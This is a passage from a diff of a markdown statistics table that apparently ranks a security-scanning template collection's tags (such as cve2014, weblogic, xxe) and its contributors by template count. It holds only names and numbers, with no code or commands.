rootxharsh | 5 | | | | | | | -| fuzz | 14 | elsfa7110 | 5 | | | | | | | -| cve2011 | 14 | panch0r3d | 5 | | | | | | | -| login | 14 | yanyun | 5 | | | | | | | +| cve2014 | 18 | elsfa7110 | 5 | | | | | | | +| debug | 18 | rootxharsh | 5 | | | | | | | +| springboot | 18 | panch0r3d | 5 | | | | | | | +| php | 16 | yanyun | 5 | | | | | | | +| fuzz | 14 | ganofins | 5 | | | | | | | +| struts | 14 | iamnoooob | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| login | 14 | nodauf | 4 | | | | | | | +| cve2011 | 14 | xelkomy | 4 | | | | | | | | cve2012 | 14 | e_schultze_ | 4 | | | | | | | -| struts | 14 | lu4nx | 4 | | | | | | | -| weblogic | 14 | github.com/its0x08 | 4 | | | | | | | -| android | 13 | xelkomy | 4 | | | | | | | -| dns | 13 | nodauf | 4 | | | | | | | +| adobe | 13 | lu4nx | 4 | | | | | | | +| devops | 13 | github.com/its0x08 | 4 | | | | | | | +| dns | 13 | johnk3r | 3 | | | | | | | | zoho | 13 | unstabl3 | 3 | | | | | | | -| adobe | 13 | sushantkamble | 3 | | | | | | | -| devops | 13 | impramodsargar | 3 | | | | | | | -| aws | 12 | shifacyclewala | 3 | | | | | | | +| android | 13 | jarijaas | 3 | | | | | | | +| jenkins | 12 | shifacyclewala | 3 | | | | | | | | dlink | 12 | incogbyte | 3 | | | | | | | -| jenkins | 12 | johnk3r | 3 | | | | | | | -| wp-theme | 11 | shine | 3 | | | | | | | -| cve2013 | 11 | _generic_human_ | 3 | | | | | | | -| dell | 10 | vsh00t | 3 | | | | | | | -| xxe | 10 | idealphase | 3 | | | | | | | -| intrusive | 9 | skeltavik | 3 | | | | | | | -| magento | 9 | emenalf | 3 | | | | | | | -| ftp | 9 | fyoorer | 3 | | | | | | | -| scada | 8 | thomas_from_offensity | 3 | | | | | | | -| airflow | 8 | mavericknerd | 3 | | | | | | | -| gitlab | 8 | f1tz | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | +| aws | 12 | vsh00t | 3 | | | | | | | +| manageengine | 12 | tess | 3 | | | | | | | +| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | +| wp-theme | 11 | impramodsargar | 3 | | | | | | | +| dell | 10 | fyoorer | 3 | | | | | | | +| xxe | 10 | z3bd | 3 | | | | | | | +| magento | 9 | mavericknerd | 3 | | | | | | | +| intrusive | 9 | 0w4ys | 3 | | | | | | | +| ftp | 9 | skeltavik | 3 | | | | | | | +| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | +| scada | 8 | f1tz | 3 | | | | | | | +| rails | 8 | dudez | 3 | | | | | | | +| vmware | 8 | emenalf | 3 | | | | | | | | ruijie | 8 | binaryfigments | 3 | | | | | | | -| nginx | 8 | 0w4ys | 3 | | | | | | | -| rails | 8 | tess | 3 | | | | | | | -| ibm | 7 | jarijaas | 3 | | | | | | | -| kubernetes | 7 | yash anand @yashanand155 | 3 | | | | | | | -| google | 7 | dudez | 3 | | | | | | | -| microsoft | 7 | gal nagli | 2 | | | | | | | -| cve2009 | 7 | manas_harsh | 2 | | | | | | | -| cms | 7 | lotusdll | 2 | | | | | | | -| backup | 7 | moritz nentwig | 2 | | | | | | | -| files | 7 | g4l1t0 | 2 | | | | | | | -| confluence | 7 | vavkamil | 2 | | | | | | | -| coldfusion | 7 | cocxanh | 2 | | | | | | | -| vmware | 7 | udit_thakkur | 2 | | | | | | | -| netgear | 7 | r3naissance | 2 | | | | | | | -| citrix | 6 | w4cky_ | 2 | | | | | | | -| rconfig | 6 | fabaff | 2 | | | | | | | -| cve2008 | 6 | pxmme1337 | 2 | | | | | | | -| docker | 6 | 0xprial | 2 | | | | | | | -| laravel | 6 | hahwul | 2 | | | | | | | -| jetty | 6 | mohammedsaneem | 2 | | | | | | | -| api | 6 | gevakun | 2 | | | | | | | -| django | 6 | x1m_martijn | 2 | | | | | | | -| solr | 6 | whoever | 2 | | | | | | | -| ssti | 5 | 0xsapra | 2 | | | | | | | -| deserialization | 5 | bing0o | 2 | | | | | | | -| circarlife | 5 | socketz | 2 | | | | | | | -| tomcat | 5 | davidmckennirey | 2 | | | | | | | -| jolokia | 5 | amsda | 2 | | | | | | | -| drupal | 5 | 0xsmiley | 2 | | | | | | | -| java | 5 | afaq | 2 | | | | | | | -| phpmyadmin | 5 | 0xelkomy | 2 | | | | | | | -| fileupload | 5 | bp0lr | 2 | | | | | | | -| printer | 5 | zomsop82 | 2 | | | | | | | -| dedecms | 5 | random-robbie | 2 | | | | | | | -| windows | 5 | arcc | 2 | | | | | | | -| lucee | 5 | 0xcrypto | 2 | | | | | | | -| nodejs | 5 | huowuzhao | 2 | | | | | | | -| headless | 5 | alifathi-h1 | 2 | | | | | | | -| iis | 5 | 0xrudra | 2 | | | | | | | -| symfony | 4 | ree4pwn | 2 | | | | | | | -| samsung | 4 | nkxxkn | 2 | | | | | | | -| wso2 | 4 | ehsahil | 2 | | | | | | | -| thinkcmf | 4 | bernardofsr | 2 | | | | | | | -| git | 4 | joeldeleep | 2 | | | | | | | -| hp | 4 | convisoappsec | 2 | | | | | | | -| magmi | 4 | koti2 | 2 | | | | | | | -| firmware | 4 | foulenzer | 2 | | | | | | | -| proxy | 4 | swissky | 2 | | | | | | | -| moodle | 4 | bsysop | 2 | | | | | | | -| hongdian | 4 | hetroublemakr | 2 | | | | | | | -| glpi | 4 | dheerajmadhukar | 2 | | | | | | | -| solarwinds | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| elastic | 4 | kiblyn11 | 2 | | | | | | | -| artifactory | 4 | randomrobbie | 2 | | | | | | | -| crlf | 4 | parth | 2 | | | | | | | -| zimbra | 4 | johnjhacking | 2 | | | | | | | -| resin | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| cnvd | 8 | sushantkamble | 3 | | | | | | | +| airflow | 8 | _generic_human_ | 3 | | | | | | | +| nginx | 8 | idealphase | 3 | | | | | | | +| google | 7 | shine | 3 | | | | | | | +| ibm | 7 | johnjhacking | 2 | | | | | | | +| cms | 7 | whoever | 2 | | | | | | | +| backup | 7 | pxmme1337 | 2 | | | | | | | +| coldfusion | 7 | randomrobbie | 2 | | | | | | | +| microsoft | 7 | 0xcrypto | 2 | | | | | | | +| netgear | 7 | arcc | 2 | | | | | | | +| cve2009 | 7 | lotusdll | 2 | | | | | | | +| files | 7 | joeldeleep | 2 | | | | | | | +| confluence | 7 | amsda | 2 | | | | | | | +| kubernetes | 7 | g4l1t0 | 2 | | | | | | | +| api | 6 | manas_harsh | 2 | | | | | | | +| django | 6 | hetroublemakr | 2 | | | | | | | +| solr | 6 | davidmckennirey | 2 | | | | | | | +| laravel | 6 | 0xelkomy | 2 | | | | | | | +| rconfig | 6 | kiblyn11 | 2 | | | | | | | +| cve2008 | 6 | koti2 | 2 | | | | | | | +| citrix | 6 | bing0o | 2 | | | | | | | +| jetty | 6 | alifathi-h1 | 2 | | | | | | | +| docker | 6 | udit_thakkur | 2 | | | | | | | +| ssti | 5 | r3naissance | 2 | | | | | | | +| java | 5 | cocxanh | 2 | | | | | | | +| windows | 5 | hahwul | 2 | | | | | | | +| lucee | 5 | random-robbie | 2 | | | | | | | +| dedecms | 5 | socketz | 2 | | | | | | | +| circarlife | 5 | w4cky_ | 2 | | | | | | | +| printer | 5 | bernardofsr | 2 | | | | | | | +| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | +| hp | 5 | parth | 2 | | | | | | | +| iis | 5 | afaq | 2 | | | | | | | +| drupal | 5 | bsysop | 2 | | | | | | | +| headless | 5 | bp0lr | 2 | | | | | | | +| nodejs | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| deserialization | 5 | 0xprial | 2 | | | | | | | +| tomcat | 5 | ehsahil | 2 | | | | | | | +| fileupload | 5 | mohammedsaneem | 2 | | | | | | | +| jolokia | 5 | fabaff | 2 | | | | | | | +| grafana | 4 | gevakun | 2 | | | | | | | +| asp | 4 | swissky | 2 | | | | | | | +| samsung | 4 | zomsop82 | 2 | | | | | | | +| artifactory | 4 | nkxxkn | 2 | | | | | | | +| solarwinds | 4 | 0xsmiley | 2 | | | | | | | +| exchange | 4 | 0xsapra | 2 | | | | | | | +| traversal | 4 | vavkamil | 2 | | | | | | | +| firmware | 4 | huowuzhao | 2 | | | | | | | +| symfony | 4 | foulenzer | 2 | | | | | | | +| resin | 4 | convisoappsec | 2 | | | | | | | +| moodle | 4 | dheerajmadhukar | 2 | | | | | | | +| symantec | 4 | 0xrudra | 2 | | | | | | | +| camera | 4 | ree4pwn | 2 | | | | | | | +| strapi | 4 | moritz nentwig | 2 | | | | | | | +| webserver | 4 | gal nagli | 2 | | | | | | | +| thinkcmf | 4 | wabafet | 1 | | | | | | | +| magmi | 4 | affix | 1 | | | | | | | +| wso2 | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| vpn | 4 | gboddin | 1 | | | | | | | +| git | 4 | shreyapohekar | 1 | | | | | | | +| proxy | 4 | j33n1k4 | 1 | | | | | | | +| hongdian | 4 | hakluke | 1 | | | | | | | +| buffalo | 4 | dawid-czarnecki | 1 | | | | | | | +| zabbix | 4 | @dwisiswant0 | 1 | | | | | | | +| thinkphp | 4 | ratnadip gajbhiye | 1 | | | | | | | +| glpi | 4 | b0rn2r00t | 1 | | | | | | | +| zimbra | 4 | ldionmarcil | 1 | | | | | | | +| crlf | 4 | juicypotato1 | 1 | | | | | | | +| elastic | 4 | sickwell | 1 | | | | | | | +| kevinlab | 3 | mass0ma | 1 | | | | | | | +| log | 3 | 0xtavian | 1 | | | | | | | +| itop | 3 | sy3omda | 1 | | | | | | | +| fpd | 3 | s1r1u5_ | 1 | | | | | | | +| bigip | 3 | soyelmago | 1 | | | | | | | +| ssh | 3 | b4uh0lz | 1 | | | | | | | +| r-seenet | 3 | schniggie | 1 | | | | | | | +| ebs | 3 | co0nan | 1 | | | | | | | +| terramaster | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| targa | 3 | ipanda | 1 | | | | | | | +| smtp | 3 | elder tao | 1 | | | | | | | +| zhiyuan | 3 | cookiehanhoan | 1 | | | | | | | +| prometheus | 3 | 0ut0fb4nd | 1 | | | | | | | +| opensis | 3 | willd96 | 1 | | | | | | | +| microstrategy | 3 | borna nematzadeh | 1 | | | | | | | +| openam | 3 | vzamanillo | 1 | | | | | | | +| injection | 3 | tirtha_mandal | 1 | | | | | | | +| fanruan | 3 | streetofhackerr007 | 1 | | | | | | | +| httpd | 3 | kareemse1im | 1 | | | | | | | +| nexus | 3 | sullo | 1 | | | | | | | +| lfr | 3 | kabirsuda | 1 | | | | | | | +| jellyfin | 3 | toufik airane | 1 | | | | | | | +| ofbiz | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| openssh | 3 | andysvints | 1 | | | | | | | +| caucho | 3 | shifacyclewla | 1 | | | | | | | +| npm | 3 | noamrathaus | 1 | | | | | | | +| vbulletin | 3 | zandros0 | 1 | | | | | | | +| bitrix | 3 | remonsec | 1 | | | | | | | +| nosqli | 3 | izn0u | 1 | | | | | | | +| mail | 3 | berkdusunur | 1 | | | | | | | +| amazon | 3 | x6263 | 1 | | | | | | | +| springcloud | 3 | thezakman | 1 | | | | | | | +| kafka | 3 | luskabol | 1 | | | | | | | +| jeesns | 3 | aresx | 1 | | | | | | | +| nacos | 3 | deena | 1 | | | | | | | +| firebase | 3 | pdp | 1 | | | | | | | +| linkerd | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| webserver | 4 | soyelmago | 1 | | | | | | | -| traversal | 4 | tirtha_mandal | 1 | | | | | | | -| zabbix | 4 | andirrahmani1 | 1 | | | | | | | -| grafana | 4 | kba@sogeti_esec | 1 | | | | | | | -| symantec | 4 | 0ut0fb4nd | 1 | | | | | | | -| buffalo | 4 | absshax | 1 | | | | | | | -| thinkphp | 4 | fmunozs | 1 | | | | | | | -| strapi | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| asp | 4 | raesene | 1 | | | | | | | -| exchange | 4 | schniggie | 1 | | | | | | | -| vpn | 4 | b4uh0lz | 1 | | | | | | | -| r-seenet | 3 | 52971 | 1 | | | | | | | -| nexus | 3 | nytr0gen | 1 | | | | | | | -| mongodb | 3 | borna nematzadeh | 1 | | | | | | | -| ssh | 3 | undefl0w | 1 | | | | | | | -| jellyfin | 3 | pdp | 1 | | | | | | | -| targa | 3 | izn0u | 1 | | | | | | | +| druid | 3 | adrianmf | 1 | | | | | | | +| oa | 3 | th3.d1p4k | 1 | | | | | | | +| telerik | 3 | mesaglio | 1 | | | | | | | +| hoteldruid | 3 | iampritam | 1 | | | | | | | +| kibana | 3 | _harleo | 1 | | | | | | | +| mongodb | 3 | kre80r | 1 | | | | | | | +| backups | 3 | revblock | 1 | | | | | | | | slack | 3 | notsoevilweasel | 1 | | | | | | | -| fpd | 3 | un-fmunozs | 1 | | | | | | | -| smtp | 3 | remonsec | 1 | | | | | | | -| vbulletin | 3 | jeya seelan | 1 | | | | | | | -| prometheus | 3 | tim_koopmans | 1 | | | | | | | -| oa | 3 | alperenkesk | 1 | | | | | | | -| amazon | 3 | kabirsuda | 1 | | | | | | | -| bigip | 3 | geraldino2 | 1 | | | | | | | -| fanruan | 3 | knassar702 | 1 | | | | | | | -| linkerd | 3 | ahmetpergamum | 1 | | | | | | | -| lfr | 3 | omarkurt | 1 | | | | | | | -| nosqli | 3 | _harleo | 1 | | | | | | | -| jeesns | 3 | elmahdi | 1 | | | | | | | -| opensis | 3 | shifacyclewla | 1 | | | | | | | -| tikiwiki | 3 | c3l3si4n | 1 | | | | | | | -| ebs | 3 | mhdsamx | 1 | | | | | | | -| ofbiz | 3 | infosecsanyam | 1 | | | | | | | -| springcloud | 3 | elder tao | 1 | | | | | | | -| telerik | 3 | ldionmarcil | 1 | | | | | | | -| mail | 3 | qlkwej | 1 | | | | | | | -| caucho | 3 | iampritam | 1 | | | | | | | -| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | -| injection | 3 | sicksec | 1 | | | | | | | -| bitrix | 3 | 0xteles | 1 | | | | | | | -| kibana | 3 | sshell | 1 | | | | | | | -| kafka | 3 | becivells | 1 | | | | | | | -| httpd | 3 | furkansenan | 1 | | | | | | | -| openam | 3 | alex | 1 | | | | | | | -| log | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| itop | 3 | ilovebinbash | 1 | | | | | | | -| nacos | 3 | toufik airane | 1 | | | | | | | -| terramaster | 3 | sullo | 1 | | | | | | | -| firebase | 3 | pratik khalane | 1 | | | | | | | -| druid | 3 | mass0ma | 1 | | | | | | | -| bypass | 3 | aaron_costello | 1 | | | | | | | +| tikiwiki | 3 | qlkwej | 1 | | | | | | | +| cacti | 3 | fopina | 1 | | | | | | | +| ucmdb | 2 | ahmetpergamum | 1 | | | | | | | +| node | 2 | its0x08 | 1 | | | | | | | +| service | 2 | 0xrod | 1 | | | | | | | +| avantfax | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| backups | 3 | push4d | 1 | | | | | | | -| openssh | 3 | ringo | 1 | | | | | | | -| kevinlab | 3 | alph4byt3 | 1 | | | | | | | -| hoteldruid | 3 | me9187 | 1 | | | | | | | -| microstrategy | 3 | bjhulst | 1 | | | | | | | -| cacti | 3 | co0nan | 1 | | | | | | | -| camera | 3 | ipanda | 1 | | | | | | | -| npm | 3 | udyz | 1 | | | | | | | -| shellshock | 2 | regala_ | 1 | | | | | | | -| kentico | 2 | zhenwarx | 1 | | | | | | | -| leak | 2 | bernardo rodrigues | 1 | | | | | | | +| waf | 2 | jeya seelan | 1 | | | | | | | +| liferay | 2 | shelld3v | 1 | | | | | | | +| pega | 2 | chron0x | 1 | | | | | | | +| oauth | 2 | apt-mirror | 1 | | | | | | | +| minio | 2 | yashgoti | 1 | | | | | | | +| github | 2 | fmunozs | 1 | | | | | | | +| akkadian | 2 | retr0 | 1 | | | | | | | +| rstudio | 2 | sshell | 1 | | | | | | | +| natshell | 2 | brabbit10 | 1 | | | | | | | +| guacamole | 2 | zhenwarx | 1 | | | | | | | +| frp | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| aruba | 2 | kba@sogeti_esec | 1 | | | | | | | +| idrac | 2 | mhdsamx | 1 | | | | | | | +| middleware | 2 | rojanrijal | 1 | | | | | | | +| flir | 2 | daviey | 1 | | | | | | | +| smb | 2 | philippdelteil | 1 | | | | | | | +| bruteforce | 2 | 0h1in9e | 1 | | | | | | | +| backdoor | 2 | exploitation | 1 | | | | | | | +| ec2 | 2 | alex | 1 | | | | | | | +| getsimple | 2 | bolli95 | 1 | | | | | | | +| couchdb | 2 | knassar702 | 1 | | | | | | | +| dolibarr | 2 | patralos | 1 | | | | | | | +| hasura | 2 | geraldino2 | 1 | | | | | | | +| cve2007 | 2 | tim_koopmans | 1 | | | | | | | +| wordfence | 2 | ilovebinbash | 1 | | | | | | | +| icewarp | 2 | c3l3si4n | 1 | | | | | | | +| maian | 2 | petruknisme | 1 | | | | | | | +| ecology | 2 | divya_mudgal | 1 | | | | | | | +| horde | 2 | pudsec | 1 | | | | | | | +| ilo | 2 | sec_hawk | 1 | | | | | | | +| enumeration | 2 | evolutionsec | 1 | | | | | | | +| axis | 2 | akash.c | 1 | | | | | | | +| seeyon | 2 | makyotox | 1 | | | | | | | +| hpe | 2 | infosecsanyam | 1 | | | | | | | +| prestashop | 2 | push4d | 1 | | | | | | | +| activemq | 2 | mah3sec_ | 1 | | | | | | | +| yapi | 2 | taielab | 1 | | | | | | | +| bucket | 2 | sicksec | 1 | | | | | | | +| linux | 2 | ringo | 1 | | | | | | | +| prtg | 2 | luci | 1 | | | | | | | +| favicon | 2 | naglinagli | 1 | | | | | | | +| azure | 2 | ooooooo_q | 1 | | | | | | | +| xxljob | 2 | alperenkesk | 1 | | | | | | | +| db | 2 | me9187 | 1 | | | | | | | +| qcubed | 2 | udyz | 1 | | | | | | | +| netis | 2 | intx0x80 | 1 | | | | | | | +| chiyu | 2 | aceseven (digisec360) | 1 | | | | | | | +| sharepoint | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| xxljob | 2 | bolli95 | 1 | | | | | | | -| totemomail | 2 | apt-mirror | 1 | | | | | | | -| backdoor | 2 | kurohost | 1 | | | | | | | -| nagios | 2 | revblock | 1 | | | | | | | -| aruba | 2 | shelld3v | 1 | | | | | | | -| chamilo | 2 | _darrenmartyn | 1 | | | | | | | -| adminer | 2 | b0yd | 1 | | | | | | | -| paloalto | 2 | taielab | 1 | | | | | | | -| prtg | 2 | ohlinge | 1 | | | | | | | -| jeedom | 2 | aceseven (digisec360) | 1 | | | | | | | -| voipmonitor | 2 | luskabol | 1 | | | | | | | -| sonicwall | 2 | blckraven | 1 | | | | | | | -| storage | 2 | thevillagehacker | 1 | | | | | | | -| openfire | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| axis2 | 2 | andysvints | 1 | | | | | | | -| cache | 2 | its0x08 | 1 | | | | | | | -| sitecore | 2 | yavolo | 1 | | | | | | | -| splunk | 2 | berkdusunur | 1 | | | | | | | -| manageengine | 2 | smaranchand | 1 | | | | | | | -| cve2005 | 2 | sec_hawk | 1 | | | | | | | -| jboss | 2 | @dwisiswant0 | 1 | | | | | | | -| mida | 2 | streetofhackerr007 | 1 | | | | | | | -| guacamole | 2 | whynotke | 1 | | | | | | | -| avantfax | 2 | noamrathaus | 1 | | | | | | | -| akamai | 2 | aresx | 1 | | | | | | | -| qcubed | 2 | dawid-czarnecki | 1 | | | | | | | -| status | 2 | divya_mudgal | 1 | | | | | | | -| sonarqube | 2 | _c0wb0y_ | 1 | | | | | | | -| pega | 2 | th3.d1p4k | 1 | | | | | | | -| middleware | 2 | j33n1k4 | 1 | | | | | | | -| chiyu | 2 | manuelbua | 1 | | | | | | | -| kong | 2 | makyotox | 1 | | | | | | | -| emerge | 2 | 0xrod | 1 | | | | | | | -| oauth | 2 | ooooooo_q | 1 | | | | | | | -| sharepoint | 2 | rojanrijal | 1 | | | | | | | -| frp | 2 | zandros0 | 1 | | | | | | | -| ilo | 2 | yashgoti | 1 | | | | | | | -| liferay | 2 | patralos | 1 | | | | | | | -| globalprotect | 2 | willd96 | 1 | | | | | | | -| getsimple | 2 | sy3omda | 1 | | | | | | | -| showdoc | 2 | brabbit10 | 1 | | | | | | | -| phpcollab | 2 | petruknisme | 1 | | | | | | | -| hashicorp | 2 | evolutionsec | 1 | | | | | | | -| fortios | 2 | intx0x80 | 1 | | | | | | | -| grav | 2 | d0rkerdevil | 1 | | | | | | | -| harbor | 2 | mubassirpatel | 1 | | | | | | | -| hostheader-injection | 2 | vzamanillo | 1 | | | | | | | -| horde | 2 | affix | 1 | | | | | | | -| spark | 2 | bad5ect0r | 1 | | | | | | | -| hpe | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| axis | 2 | rotemreiss | 1 | | | | | | | -| github | 2 | ahmed sherif | 1 | | | | | | | -| prestashop | 2 | 0xtavian | 1 | | | | | | | -| igs | 2 | fopina | 1 | | | | | | | -| trixbox | 2 | mesaglio | 1 | | | | | | | -| glassfish | 2 | flag007 | 1 | | | | | | | -| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | -| vrealize | 2 | shreyapohekar | 1 | | | | | | | -| rstudio | 2 | nerrorsec | 1 | | | | | | | -| flir | 2 | micha3lb3n | 1 | | | | | | | -| jsf | 2 | hanlaomo | 1 | | | | | | | -| odoo | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| couchdb | 2 | juicypotato1 | 1 | | | | | | | -| ecology | 2 | pudsec | 1 | | | | | | | -| linux | 2 | daviey | 1 | | | | | | | -| mcafee | 2 | kre80r | 1 | | | | | | | -| bucket | 2 | naglinagli | 1 | | | | | | | -| activemq | 2 | ajaysenr | 1 | | | | | | | -| icewarp | 2 | adrianmf | 1 | | | | | | | -| idrac | 2 | chron0x | 1 | | | | | | | -| azure | 2 | defr0ggy | 1 | | | | | | | -| wordfence | 2 | thezakman | 1 | | | | | | | -| waf | 2 | exploitation | 1 | | | | | | | -| cve2007 | 2 | hakluke | 1 | | | | | | | -| minio | 2 | cookiehanhoan | 1 | | | | | | | -| rockmongo | 2 | xstp | 1 | | | | | | | -| plesk | 2 | philippdelteil | 1 | | | | | | | -| hjtcloud | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | jteles | 1 | | | | | | | -| keycloak | 2 | x6263 | 1 | | | | | | | -| dolibarr | 2 | b0rn2r00t | 1 | | | | | | | -| saltstack | 2 | rodnt | 1 | | | | | | | -| huawei | 2 | deena | 1 | | | | | | | -| ec2 | 2 | retr0 | 1 | | | | | | | -| dos | 2 | gboddin | 1 | | | | | | | -| node | 2 | akshansh | 1 | | | | | | | -| wuzhicms | 2 | s1r1u5_ | 1 | | | | | | | -| netis | 2 | yashanand155 | 1 | | | | | | | -| db | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| nextcloud | 2 | sickwell | 1 | | | | | | | -| webcam | 2 | wabafet | 1 | | | | | | | -| service | 2 | 0h1in9e | 1 | | | | | | | -| hasura | 2 | akash.c | 1 | | | | | | | -| yapi | 2 | luci | 1 | | | | | | | -| akkadian | 2 | kareemse1im | 1 | | | | | | | -| seeyon | 2 | | | | | | | | | -| bruteforce | 2 | | | | | | | | | +| sonicwall | 2 | jteles | 1 | | | | | | | +| bypass | 2 | nerrorsec | 1 | | | | | | | +| hostheader-injection | 2 | thevillagehacker | 1 | | | | | | | +| saltstack | 2 | 0xteles | 1 | | | | | | | +| igs | 2 | hanlaomo | 1 | | | | | | | +| leak | 2 | micha3lb3n | 1 | | | | | | | +| nextjs | 2 | flag007 | 1 | | | | | | | +| shellshock | 2 | whynotke | 1 | | | | | | | +| cve2005 | 2 | regala_ | 1 | | | | | | | +| sitecore | 2 | alph4byt3 | 1 | | | | | | | +| hjtcloud | 2 | smaranchand | 1 | | | | | | | +| yii | 2 | ohlinge | 1 | | | | | | | +| keycloak | 2 | furkansenan | 1 | | | | | | | +| openfire | 2 | d0rkerdevil | 1 | | | | | | | +| plesk | 2 | manuelbua | 1 | | | | | | | +| adminer | 2 | elmahdi | 1 | | | | | | | +| jboss | 2 | defr0ggy | 1 | | | | | | | +| webcam | 2 | yashanand155 | 1 | | | | | | | +| akamai | 2 | becivells | 1 | | | | | | | +| cache | 2 | bad5ect0r | 1 | | | | | | | +| grav | 2 | rotemreiss | 1 | | | | | | | +| totemomail | 2 | un-fmunozs | 1 | | | | | | | +| storage | 2 | absshax | 1 | | | | | | | +| jeedom | 2 | _darrenmartyn | 1 | | | | | | | +| kentico | 2 | @github.com/defr0ggy | 1 | | | | | | | +| spark | 2 | ajaysenr | 1 | | | | | | | +| mida | 2 | nytr0gen | 1 | | | | | | | +| splunk | 2 | 52971 | 1 | | | | | | | +| sonarqube | 2 | pratik khalane | 1 | | | | | | | +| dos | 2 | blckraven | 1 | | | | | | | +| axis2 | 2 | bjhulst | 1 | | | | | | | +| odoo | 2 | ahmed sherif | 1 | | | | | | | +| showdoc | 2 | andirrahmani1 | 1 | | | | | | | +| jsf | 2 | rodnt | 1 | | | | | | | +| glassfish | 2 | raesene | 1 | | | | | | | +| phpcollab | 2 | yavolo | 1 | | | | | | | +| chamilo | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| fortios | 2 | undefl0w | 1 | | | | | | | +| kong | 2 | b0yd | 1 | | | | | | | +| harbor | 2 | xstp | 1 | | | | | | | +| paloalto | 2 | _c0wb0y_ | 1 | | | | | | | +| nextcloud | 2 | kurohost | 1 | | | | | | | +| netsweeper | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| wuzhicms | 2 | mubassirpatel | 1 | | | | | | | +| huawei | 2 | akshansh | 1 | | | | | | | +| emerge | 2 | omarkurt | 1 | | | | | | | +| status | 2 | | | | | | | | | | geowebserver | 2 | | | | | | | | | -| natshell | 2 | | | | | | | | | -| yii | 2 | | | | | | | | | -| ucmdb | 2 | | | | | | | | | -| nextjs | 2 | | | | | | | | | -| favicon | 2 | | | | | | | | | -| netsweeper | 2 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| zms | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| shopizer | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| openvpn | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| rockethchat | 